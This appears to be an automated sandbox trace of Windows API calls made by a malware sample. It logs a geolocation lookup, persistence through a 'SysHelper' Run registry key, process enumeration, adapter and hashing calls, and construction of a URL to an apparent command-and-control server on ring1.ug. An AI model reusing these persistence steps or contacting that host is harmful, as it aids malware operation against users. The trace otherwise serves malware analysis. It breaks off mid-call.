0x0 [0131.266] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x7032f8) returned 0x90 [0131.266] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x7032f8, Size=0x94) returned 0x7032f8 [0131.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0131.266] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x18) returned 0x6f7c78 [0131.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x6f7c78, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0131.266] GetLastError () returned 0x0 [0131.266] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x7032f8) returned 0x94 [0131.266] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x7032f8, Size=0x98) returned 0x7032f8 [0131.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0131.266] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x46) returned 0x6f9408 [0131.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x6f9408, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0131.266] GetLastError () returned 0x0 [0131.266] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x7032f8) returned 0x98 [0131.266] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x7032f8, Size=0x9c) returned 0x7032f8 [0131.266] GetLastError () returned 0x0 [0131.314] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x702ec8) returned 0x80 [0131.314] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x702ec8) returned 0x80 [0131.315] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x702ec8) returned 0x80 [0131.320] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x8ec) returned 0x7047b8 [0131.362] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x702ec8) returned 0x80 [0131.362] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x10) returned 0x700cb0 [0131.362] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x702ec8) returned 0x80 [0131.363] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x702ec8) returned 0x80 [0131.363] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x702ec8) returned 0x80 [0131.407] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x702ec8) returned 0x80 [0131.415] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0131.690] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x6f6fc8 [0131.690] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0144.347] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18aff8, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18d7f8 | out: lpBuffer=0x18aff8*, lpdwNumberOfBytesRead=0x18d7f8*=0x1d1) returned 1 [0144.348] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0144.349] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0144.349] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x70d0b0 [0144.354] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1e0) returned 0x7333b0 [0144.365] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7333b0 | out: hHeap=0x6e0000) returned 1 [0144.371] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70d0b0 | out: hHeap=0x6e0000) returned 1 [0144.371] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6f6fc8 | out: hHeap=0x6e0000) returned 1 [0144.371] GetCurrentProcess () returned 0xffffffff [0144.371] GetLastError () returned 0x2 [0144.371] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0144.382] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x10) returned 0x7338c0 [0144.382] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x8ec) returned 0x320b8f8 [0144.387] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x320c1f0 [0144.387] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x320c1f0, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe")) returned 0x76 [0144.387] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1") returned 1 [0144.393] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x320c9f8 [0144.393] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe\" --AutoStart" [0144.393] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe\" --AutoStart", pNumArgs=0x18d8d8 | out: pNumArgs=0x18d8d8) returned 0x73a8e8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe" [0144.393] lstrcpyW (in: lpString1=0x18e568, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe" [0144.399] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe\" --AutoStart" [0144.399] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe\" --AutoStart", pNumArgs=0x18d874 | out: pNumArgs=0x18d874) returned 0x73a8e8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe" [0144.399] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe") returned="penelop0611_2019-11-06_10-30.exe_.exe" [0144.399] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75d20000 [0144.400] GetProcAddress (hModule=0x75d20000, lpProcName="EnumProcesses") returned 0x0 [0144.400] GetProcAddress (hModule=0x75d20000, lpProcName="EnumProcessModules") returned 0x0 [0144.400] GetProcAddress (hModule=0x75d20000, lpProcName="GetModuleBaseNameW") returned 0x0 [0144.400] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x76d00000 [0144.401] GetProcAddress (hModule=0x76d00000, lpProcName="EnumProcesses") returned 0x76d01544 [0144.402] GetProcAddress (hModule=0x76d00000, lpProcName="EnumProcessModules") returned 0x76d01408 [0144.402] GetProcAddress (hModule=0x76d00000, lpProcName="GetModuleBaseNameW") returned 0x76d0152c [0144.402] EnumProcesses (in: lpidProcess=0x183070, cb=0xa000, lpcbNeeded=0x18d880 | out: lpidProcess=0x183070, lpcbNeeded=0x18d880) returned 1 [0144.405] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0144.405] CloseHandle (hObject=0x0) returned 0 [0144.405] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0144.405] CloseHandle (hObject=0x0) returned 0 [0144.405] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0144.405] CloseHandle (hObject=0x0) returned 0 [0144.406] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0144.406] CloseHandle (hObject=0x0) returned 0 [0144.406] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0144.406] CloseHandle (hObject=0x0) returned 0 [0144.406] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0144.406] CloseHandle (hObject=0x0) returned 0 [0144.406] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0144.406] CloseHandle (hObject=0x0) returned 0 [0144.406] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1c8) returned 0x0 [0144.406] CloseHandle (hObject=0x0) returned 0 [0144.406] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d0) returned 0x0 [0144.406] CloseHandle (hObject=0x0) returned 0 [0144.406] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0144.406] CloseHandle (hObject=0x0) returned 0 [0144.406] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0144.406] CloseHandle (hObject=0x0) returned 0 [0144.406] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0144.407] CloseHandle (hObject=0x0) returned 0 [0144.407] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0144.407] CloseHandle (hObject=0x0) returned 0 [0144.407] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0 [0144.407] CloseHandle (hObject=0x0) returned 0 [0144.407] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0144.407] CloseHandle (hObject=0x0) returned 0 [0144.407] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0144.407] CloseHandle (hObject=0x0) returned 0 [0144.407] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc8) returned 0x0 [0144.407] CloseHandle (hObject=0x0) returned 0 [0144.407] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x36c) returned 0x5a0 [0144.407] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 0 [0144.407] CloseHandle (hObject=0x5a0) returned 1 [0144.407] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x378) returned 0x5a0 [0144.407] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 0 [0144.408] CloseHandle (hObject=0x5a0) returned 1 [0144.408] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x410) returned 0x5a0 [0144.408] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 0 [0144.408] CloseHandle (hObject=0x5a0) returned 1 [0144.408] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x44c) returned 0x0 [0144.408] CloseHandle (hObject=0x0) returned 0 [0144.408] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4d4) returned 0x5a0 [0144.408] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0144.410] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x400000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="penelop0611_2019-11-06_10-30.exe_.exe") returned 0x25 [0144.410] CloseHandle (hObject=0x5a0) returned 1 [0144.410] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x510) returned 0x0 [0144.410] CloseHandle (hObject=0x0) returned 0 [0144.410] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x540) returned 0x5a0 [0144.410] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 0 [0144.410] CloseHandle (hObject=0x5a0) returned 1 [0144.410] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x560) returned 0x0 [0144.410] CloseHandle (hObject=0x0) returned 0 [0144.410] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x574) returned 0x5a0 [0144.410] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0144.412] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x400000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="reader_sl.exe") returned 0xd [0144.412] CloseHandle (hObject=0x5a0) returned 1 [0144.412] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x214) returned 0x5a0 [0144.412] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 0 [0144.412] CloseHandle (hObject=0x5a0) returned 1 [0144.412] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x444) returned 0x5a0 [0144.412] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 0 [0144.412] CloseHandle (hObject=0x5a0) returned 1 [0144.412] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x590) returned 0x5a0 [0144.412] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 0 [0144.412] CloseHandle (hObject=0x5a0) returned 1 [0144.413] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x28) returned 0x70a8c0 [0144.413] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x7333b0 [0144.413] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x32002b8 [0144.413] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x31f2378 [0144.413] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x3227260 [0144.413] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x7340b0 [0144.413] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x734318 [0144.413] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x320d210 [0144.413] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x320d478 [0144.413] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x320d6e0 [0144.413] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x320d948 [0144.413] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18d870 | out: phkResult=0x18d870*=0x5a0) returned 0x0 [0144.413] RegQueryValueExW (in: hKey=0x5a0, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18d86c, lpData=0x18bf98, lpcbData=0x18d850*=0x400 | out: lpType=0x18d86c*=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe\" --AutoStart", lpcbData=0x18d850*=0x10a) returned 0x0 [0144.413] RegCloseKey (hKey=0x5a0) returned 0x0 [0144.413] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x110) returned 0x31d1be8 [0144.413] lstrlenA (lpString="\" --AutoStart") returned 13 [0144.413] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xf0) returned 0x710a30 [0144.413] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31d1be8 | out: hHeap=0x6e0000) returned 1 [0144.413] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe") returned 1 [0144.413] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xf0) returned 0x31bc850 [0144.413] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x710a30 | out: hHeap=0x6e0000) returned 1 [0144.414] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x28) returned 0x322d5c8 [0144.414] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x320dbb0 [0144.414] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x3202ec8 [0144.414] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x3203130 [0144.414] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x3203398 [0144.414] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x3203600 [0144.414] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x3203868 [0144.414] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x31f9590 [0144.414] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x31f97f8 [0144.414] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x31f9a60 [0144.414] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x31f9cc8 [0144.414] lstrlenA (lpString="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php") returned 58 [0144.414] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x76) returned 0x7404a8 [0144.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x320dbb0, cbMultiByte=-1, lpWideCharStr=0x7404a8, cchWideChar=59 | out: lpWideCharStr="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php") returned 59 [0144.414] lstrcatW (in: lpString1="", lpString2="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php" | out: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php") returned="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php" [0144.414] lstrlenA (lpString="") returned 0 [0144.414] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x2) returned 0x31aedb0 [0144.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3202ec8, cbMultiByte=-1, lpWideCharStr=0x31aedb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0144.414] lstrcatW (in: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php", lpString2="" | out: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php") returned="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php" [0144.414] lstrlenA (lpString="") returned 0 [0144.414] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x2) returned 0x31aedd0 [0144.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3203130, cbMultiByte=-1, lpWideCharStr=0x31aedd0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0144.414] lstrcatW (in: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php", lpString2="" | out: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php") returned="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php" [0144.414] lstrlenA (lpString="") returned 0 [0144.414] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x2) returned 0x31aeda0 [0144.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3203398, cbMultiByte=-1, lpWideCharStr=0x31aeda0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0144.414] lstrcatW (in: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php", lpString2="" | out: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php") returned="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php" [0144.414] lstrlenA (lpString="") returned 0 [0144.414] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x2) returned 0x31aee40 [0144.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3203600, cbMultiByte=-1, lpWideCharStr=0x31aee40, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0144.414] lstrcatW (in: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php", lpString2="" | out: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php") returned="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php" [0144.414] lstrlenA (lpString="") returned 0 [0144.414] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x2) returned 0x31aedc0 [0144.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3203868, cbMultiByte=-1, lpWideCharStr=0x31aedc0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0144.415] lstrcatW (in: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php", lpString2="" | out: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php") returned="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php" [0144.415] lstrlenA (lpString="") returned 0 [0144.415] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x2) returned 0x31aedf0 [0144.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31f9590, cbMultiByte=-1, lpWideCharStr=0x31aedf0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0144.415] lstrcatW (in: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php", lpString2="" | out: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php") returned="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php" [0144.415] lstrlenA (lpString="") returned 0 [0144.415] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x2) returned 0x31aee00 [0144.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31f97f8, cbMultiByte=-1, lpWideCharStr=0x31aee00, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0144.415] lstrcatW (in: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php", lpString2="" | out: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php") returned="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php" [0144.415] lstrlenA (lpString="") returned 0 [0144.415] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x2) returned 0x31aee60 [0144.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31f9a60, cbMultiByte=-1, lpWideCharStr=0x31aee60, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0144.415] lstrcatW (in: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php", lpString2="" | out: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php") returned="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php" [0144.415] lstrlenA (lpString="") returned 0 [0144.415] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x2) returned 0x31aee10 [0144.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31f9cc8, cbMultiByte=-1, lpWideCharStr=0x31aee10, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0144.415] lstrcatW (in: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php", lpString2="" | out: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php") returned="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php" [0144.415] lstrlenW (lpString="") returned 0 [0144.415] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x12) returned 0x727308 [0144.415] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x288) returned 0x3203ad0 [0144.415] GetAdaptersInfo (in: AdapterInfo=0x3203ad0, SizePointer=0x18d834 | out: AdapterInfo=0x3203ad0, SizePointer=0x18d834) returned 0x0 [0144.485] GetAdaptersInfo (in: AdapterInfo=0x3203ad0, SizePointer=0x18d834 | out: AdapterInfo=0x3203ad0, SizePointer=0x18d834) returned 0x0 [0144.487] GetLastError () returned 0x0 [0144.488] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1000) returned 0x3211f08 [0144.488] GetLastError () returned 0x0 [0144.488] GetLastError () returned 0x0 [0144.500] CryptAcquireContextW (in: phProv=0x18d804, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18d804*=0x741978) returned 1 [0144.501] CryptCreateHash (in: hProv=0x741978, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18d80c | out: phHash=0x18d80c) returned 1 [0144.501] CryptHashData (hHash=0x70f698, pbData=0x31f4130, dwDataLen=0x11, dwFlags=0x0) returned 1 [0144.501] CryptGetHashParam (in: hHash=0x70f698, dwParam=0x2, pbData=0x0, pdwDataLen=0x18d808, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18d808) 